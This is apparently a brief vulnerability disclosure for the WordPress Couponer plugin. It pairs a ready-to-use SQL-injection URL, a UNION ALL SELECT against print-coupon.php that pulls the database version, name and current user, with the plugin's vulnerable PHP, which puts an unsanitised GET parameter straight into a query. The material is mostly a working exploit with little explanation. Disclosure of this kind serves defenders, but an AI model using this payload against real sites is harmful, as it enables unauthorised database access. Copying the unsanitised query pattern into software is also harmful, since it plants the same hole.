http://www.xxxx.com/wp-content/plugins/couponer/print-coupon.php?ID=-1' UNION ALL SELECT 1,version(),database(),current_user(),5,6,7,8,9,10--%20 --------------- Vulnerable code --------------- $ID = $_GET['ID']; ... $sql_get_coupon_id = "SELECT *, DATE_FORMAT(Expires, '%b %e, %Y') as Expires, DATE_FORMAT(Created, '%b %e, %Y') as Created FROM wp_couponer WHERE ID='$ID'"; $result_get_coupon_id = mysql_query($sql_get_coupon_id);
WordPress的Couponer插件
评论 (0)